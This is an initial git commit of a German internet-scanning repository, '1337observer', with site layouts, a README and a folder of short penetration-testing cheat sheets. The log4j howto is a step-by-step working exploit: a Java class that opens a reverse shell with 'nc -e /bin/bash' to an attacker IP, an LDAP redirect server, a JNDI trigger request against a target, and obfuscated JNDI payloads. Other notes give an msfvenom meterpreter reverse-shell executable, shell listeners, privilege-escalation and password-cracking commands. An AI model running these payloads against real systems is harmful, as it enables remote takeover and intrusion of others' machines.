init

Leetcore · Jan 27, 2022 · 2c308d1 · 2c308d1
commit 2c308d1
Show file tree

Hide file tree

Showing 73 changed files with 9,637 additions and 0 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,11 @@
+**.bolt
+**.log
+*.lock
+.vscode/*
+.DS_Store
+**.DS_Store
+bugbounty/*
+groups/**
+input/**
+scans/*
+**.resume.cfg
diff --git a/BlockZone.ttf b/BlockZone.ttf
diff --git a/CNAME b/CNAME
@@ -0,0 +1 @@
+www.1337.observer
diff --git a/LICENSE b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2020 1337core
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/README.md b/README.md
@@ -0,0 +1,28 @@
+## Willkommen bei 1337observer
+Hier werden einfache Tools und Listen programmiert, um das Internet zu scannen.
+
+* Unter /scripts liegt `discover.py`.
+* Unter /scans werden standardmäßig die Scans abgelegt.
+
+# Installation
+* Subfinder: https://www.github.com/projectdiscovery/subfinder (MUSS!)
+* httpx: https://www.github.com/projectdiscovery/httpx  (MUSS!)
+* Nuclei: https://www.github.com/projectdiscovery/nuclei (MUSS!)
+* Python 3: https://www.python.org/ (MUSS!)
+
+# Standard Scan:
+Das Script `discover.py` automatisiert die Tools.
+Man startet mit einer Liste von Domains im Format `domain.de`.
+
+Im Hauptordner ausführen:
+`python3 scripts/discovery.py -i lists/domains.txt -batch yes`
+
+## Ergebnisse filtern nach Text z.B. Mail, OWA, Wordpress:
+
+Wer spezielle Server/URLs sucht, kann mit `grep` die Ergebnisse filtern und weiterverarbeiten.
+Um alle Mailserver zu checken, die eine erreichbare Webseite haben, filtert man im Ordner "scans"
+die Unterordner der Ergebnisse so:
+
+```
+grep -rih owa */active.txt
+```
diff --git a/_config.yml b/_config.yml
@@ -0,0 +1,9 @@
+theme: jekyll-theme-hacker
+plugins:
+  - jekyll-titles-from-headings
+  - jekyll-feed
+permalink: :title:output_ext
+titles_from_headings:
+  enabled:     true
+  strip_title: false
+  collections: false
diff --git a/_layouts/default.html b/_layouts/default.html
@@ -0,0 +1,29 @@
+<!DOCTYPE html>
+<html lang="de">
+
+<head>
+	<meta charset="UTF-8">
+	<meta http-equiv="X-UA-Compatible" content="IE=edge">
+	<meta name="viewport" content="width=device-width, initial-scale=1.0">
+	<title>{{ page.title }}</title>
+	<link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed.xml" />
+	<link rel="stylesheet" href="/style.css">
+	<!--
+
+
+	Aus großer Macht folgt große Verantwortung! 
+
+
+	-->
+</head>
+
+	<body>
+		<header>
+			<a href="/">&lt;&lt; 1337observer</a>
+		</header>
+		<article id="main">
+			{{ content }}
+		</article>
+	</body>
+
+</html>
diff --git a/_layouts/frontpage.html b/_layouts/frontpage.html
@@ -0,0 +1,54 @@
+<!DOCTYPE html>
+<html lang="de">
+
+<head>
+	<meta charset="UTF-8">
+	<meta http-equiv="X-UA-Compatible" content="IE=edge">
+	<meta name="viewport" content="width=device-width, initial-scale=1.0">
+	<title>🌍🏄🏻‍♂️👁 1337observer</title>
+	<link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed.xml" />
+	<link rel="stylesheet" type="text/css" href="/style.css" />
+	<!--
+
+
+	Aus großer Macht folgt große Verantwortung! 
+
+
+	-->
+</head>
+
+<body>
+	<div id="main">
+		<pre>
+█▀ ██▀▄▄ █▀▄▄ █▄▄▄ ████▀▀███▀▀███▀▀██▀▀██▀██▀██▀██▀▀██▀██
+██ ████▄▀███▄▀███ ████ ██ █ ▀▀▄█ ▀██ ▀▀█ █ █ ██ █ ▀▀█ █ █
+██ ██▄▀▀ █▄▀▀ ██▌▐██▀█▄▀▀▄█ ▀▀▄█▀▀▄█ ▀▀█ ▄▀█▄▀▄██ ▀▀█ ▄▀█
+		</pre>
+		<h1 style="text-align: center">Internet-Safari 🦎🦉🦒</h1>
+		<p>
+			Herzlich Willkommen im Internet. Die wilde Fahrt beginnt gleich!
+		</p>
+		<p>
+			Wir suchen im Web nach interessanten, vergessen Webseiten, Subdomains und Servern.
+			In diesem Repo sind einige Scripte, Anleitungen und Wortlisten für eine
+			umfangreiche Entdeckertour!
+		</p>
+
+		<h2>RSS</h2>
+		<ul>
+			{% for post in site.posts limit:3 %}
+			<li>
+				<a href="{{ post.url }}">{{ post.title }}</a>
+			</li>
+			{% endfor %}
+		</ul>
+
+		<h2>anleitungen</h2>
+		<ul>
+			<li><a href="https://github.com/Leetcore/1337-observer/blob/main/README.md">ReadMe</a></li>
+		</ul>
+
+	</div>
+</body>
+
+</html>
diff --git a/_layouts/post.html b/_layouts/post.html
@@ -0,0 +1,7 @@
+---
+layout: default
+---
+
+<h1>{{ page.title }}</h1>
+
+{{content}}
diff --git a/_posts/2022-01-01-Hallo-Welt.md b/_posts/2022-01-01-Hallo-Welt.md
@@ -0,0 +1,6 @@
+---
+layout: post
+title:  "Hallo Welt"
+---
+
+In diesem Projekt werden Tools und HowTos gesammelt.
diff --git a/blockzone-webfont.woff2 b/blockzone-webfont.woff2
diff --git a/config/resolver.txt b/config/resolver.txt
@@ -0,0 +1,9 @@
+9.9.9.9
+1.1.1.1
+8.8.8.8
+8.8.4.4
+84.200.69.80
+84.200.70.40
+85.214.73.63
+208.67.222.222
+208.67.220.220
diff --git a/howtos/encoding.md b/howtos/encoding.md
@@ -0,0 +1,17 @@
+# Encoding with Linux
+
+
+## string to base64
+``` bash
+echo -n "string" | base64
+```
+
+## base64 to string
+``` bash
+echo -n "base64" | base64 -d
+```
+
+## string to hex
+``` bash
+echo -n "" | xxd -r -p
+```
diff --git a/howtos/hashcat.md b/howtos/hashcat.md
@@ -0,0 +1,5 @@
+# Hashcat
+
+```
+hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt 
+```
diff --git a/howtos/johntheripper.md b/howtos/johntheripper.md
@@ -0,0 +1,14 @@
+# John The Ripper
+
+## generate hash to crack it
+
+``` bash
+/path/other/xls2john excel.xls
+zip2john zipfile.zip
+```
+
+## cracking
+
+``` bash
+john --wordlist=path/wordlist.txt crack.hash
+```
diff --git a/howtos/jwt.md b/howtos/jwt.md
@@ -0,0 +1,5 @@
+# JWT
+
+```
+python3 jwt_tool.py -T "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWJjZmZjZmJhNWQ3ZTA0NjBiYWYwNDAiLCJuYW1lIjoiYWxleGFsZXgiLCJlbWFpbCI6InJvb3RAcm9vdC5jb20iLCJpYXQiOjE2Mzk3NzYyNTl9.f0vUjLd9Sq9xrODccH5oc2C7PBWMmVuuEDUuLwiJo6c" -S hs256 -p "gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE"
+```
diff --git a/howtos/linux-info.md b/howtos/linux-info.md
@@ -0,0 +1,8 @@
+# Linux enum info
+
+## proc
+``` bash
+/proc/net/tcp
+/proc/sched_debug
+/proc/pid/cmdline
+```
diff --git a/howtos/linux-root.md b/howtos/linux-root.md
@@ -0,0 +1,21 @@
+# From user to root
+``` bash
+find / -perm +6000 2> /dev/null
+```
+
+## check apps you can run
+``` bash
+sudo -l
+```
+
+## root flag
+``` bash
+command_you_can_run --var-in-there="/root/flag.txt"
+```
+
+## core dumps
+``` bash
+ulimit -S -c unlimited
+kill -11 pid
+cat /var/crash/...
+```
diff --git a/howtos/log4j.md b/howtos/log4j.md
@@ -0,0 +1,48 @@
+# Log4J exploit
+
+## Install and start LDAP server that redirects to your exploit class:
+https://github.com/mbechler/marshalsec
+
+```
+git clone https://github.com/mbechler/marshalsec.git
+mvn clean package -DskipTests
+java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.IP:8000/#Exploit"
+```
+
+## Save exploit class to Exploit.java:
+```
+public class Exploit {
+    static {
+        try {
+            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP 1337");
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
+```
+
+## Compile exploit to Javacode:
+```
+javac Exploit.java -source 8 -target 8
+```
+
+## Host Javacode with python:
+```
+python3 -m http.server
+```
+
+## Wait for reverse shell:
+```
+nc -lnvp 1337
+```
+
+## Trigger Log4J to connect with your LDAP:
+```
+curl 'http://TARGET:8983/?foo=$\{jndi:ldap://YOUR.IP:1389/Exploit\}'
+```
+
+```
+${jndi:${lower:l}${lower:d}a${lower:p}://xx.interactsh.com/poc}
+${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.xx.interactsh.com/poc}
+```
diff --git a/howtos/minimodem.md b/howtos/minimodem.md
@@ -0,0 +1,12 @@
+# Minimodem
+
+## ascii to WAV
+
+``` bash
+echo -n "string" | minimodem -t -f 1200.wav 1200
+```
+
+## WAV to ascii
+``` bash
+minimodem -r -f 1200.wav 1200
+```
diff --git a/howtos/monogdb.md b/howtos/monogdb.md
@@ -0,0 +1,8 @@
+#
+
+``` bash
+mongo
+show dbs
+use dbname
+db.dbname.find()
+```
diff --git a/howtos/msfvenom.md b/howtos/msfvenom.md
@@ -0,0 +1,8 @@
+# MSFVENOM
+
+
+``` bash
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe -o /home/kali/Desktop/rs_exploitl.exe
+```
+
+
diff --git a/howtos/nc.md b/howtos/nc.md
@@ -0,0 +1,10 @@
+# NC
+
+``` bash
+nc -nvlp 1337
+```
+
+## updgrade shell
+``` bash
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
diff --git a/howtos/nmap.md b/howtos/nmap.md
@@ -0,0 +1,30 @@
+# NMAP
+
+## basic scan
+``` bash
+sudo nmap -sV -sS -sC host
+```
+
+## SNMP
+``` bash
+sudo nmap --script=snmp* -sU IP
+```
+
+## Vulners script
+Single target:
+
+``` bash
+nmap -sV --script vulners --script-args mincvss=9 host
+```
+
+Fast host list:
+
+``` bash
+nmap --top-ports 50 --open -sV -T5 --script vulners --script-args mincvss=9 --stats-every 60s -iL domains.txt -oN nmap.txt
+```
+
+## nmap searchsploit
+``` bash
+nmap -sV -sC host -oX host.xml
+searchsploit --nmap host.xml
+```